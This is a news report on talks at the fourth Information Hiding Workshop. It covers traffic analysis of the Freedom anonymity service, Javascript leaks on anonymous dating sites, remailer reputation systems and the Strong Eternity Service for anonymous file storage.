PITTSBURGH, Pennsylvania -- It's a refrain so common it's unremarkable: Privacy is dead on the Net, and being able to shield your identity online is about as likely as winning the lottery. Twice.
Just don't tell that to the researchers who gathered this week for the fourth Information Hiding Workshop, an event that's on the front lines of the pitched battle over anonymity vs. traceability.
These roughly 100 scientists, engineers, and mathematicians don't want you to have to rely on the law to shield your online identity from prying eyes. After all, laws can change, some countries lack legal protection, and even websites you trust may surreptitiously leak information or suffer security breaches.
Instead, they believe, anonymity-enhancing technologies should allow you to not hand over personal information in the first place: Call it the minimalist approach to privacy.
On Thursday, Ulf Moeller, a researcher at Zero Knowledge Systems in Montreal, described the company's ongoing efforts to improve its Freedom product, which provides privacy-protected Web surfing and e-mail.
He said that while Freedom is relatively speedy and not vulnerable to denial-of-service attacks, it is somewhat more prone to "traffic analysis."
No, he's not talking about counting cars on highways. He means that someone who wanted to know if Alice is sending e-mail to Bob would -- through something like the FBI's Carnivore system -- intercept messages that leave Alice's computer and arrive at Bob's.
Though the e-mail might be encrypted so the FBI couldn't read the contents, if Bob receives a message soon after Alice sends it, the government would still know the duo were chatting -- which defeats the purpose of Freedom.
"Users who are worried that the NSA is trying to monitor them would not be advised to use this system," Moeller said. He added that only government agencies would likely have the resources to conduct such extensive surveillance, however.
Moeller said one solution would be for the Freedom software to send lots of fake messages to Bob, a procedure called link padding, so the NSA or FBI couldn't tell when Alice includes one in the stream as well. The downside: That eats a lot of bandwidth, and wouldn't work well on a dial-up connection.
"If anybody could come up with answers, we would be very pleased to hear from you," Moeller told the audience.
Another paper described how Java and Javascript can -- unless website designers are extraordinarily cautious -- expose information about someone hoping to remain anonymous on a dating service.
Richard Clayton, a PhD student at Cambridge University, showed how Java code embedded in an "about me" personals ad can reveal information about the Internet address of whomever reads it -- which defeats the purpose of an anonymous matchmaking site.
"The sandbox of Javascript isn't terribly good," said Clayton, who co-authored the paper with George Danezis and Markus Kuhn. "But the mere fact that it is on your machine allows it to pick up certain things from your environment."
A more elaborate version of the Java attack can let an attacker capture someone's cookies and possibly find out their real name, Clayton said. He said his colleagues demonstrated it on a matchmaking site, but many sites that allow users to post HTML could be vulnerable. (The solution, for all you webmasters: Filter Javascript tags from your users' HTML posts. Ruthlessly.)
A team of computer scientists from Cambridge, Massachusetts, offered a way to improve the Internet's anonymous mail infrastructure. The mixmaster network of remailers, which delete the "from" line and then forward your mail anonymously, has been around for years -- but because volunteers operate them without charging, service is spotty.
In a paper called "A Reputation System to Increase MIX-net Reliability," the researchers say that the solution is to add a kind of automated consumer-reports tracking of remailer performance. Reliable remailers will be scored highly, while poor performers that crash frequently will get poor scores.
One rating service already exists, but because the remailer operators know who runs it, they may decide to treat its messages better than ones sent by an average user. It's a problem similar to the one that restaurant or hotel reviewers face, say co-authors Roger Dingledine and David Molnar.
The solution: Change the mixmaster system to provide receipts for mail delivery, kind of a certified delivery standard, and permit third-party "witnesses" to monitor the performance of the system.
One presentation that's sure to rile an entertainment industry already irate about Napster and DeCSS is by Tonda Benes of Charles University in Prague.
Called the Strong Eternity Service, it represents the next generation in anonymous file storage and trading, and builds on an earlier idea by Cambridge University reader Ross Anderson.
Unlike Anderson's earlier idea, this system allows payment for anonymous information retrieval and storage -- just what Hollywood fears will happen once more content, such as movies, becomes readily available online.
The Strong Eternity Service is designed to be as difficult as possible to trace even illicit, copyrighted, or obscene files that are inserted into the network. "It seems very difficult to perform a selective attack directed against the servers that store particular information," the paper says.
In a dramatic understatement, Benes says that its "features have strong impact to contemporary view of intellectual property rights."
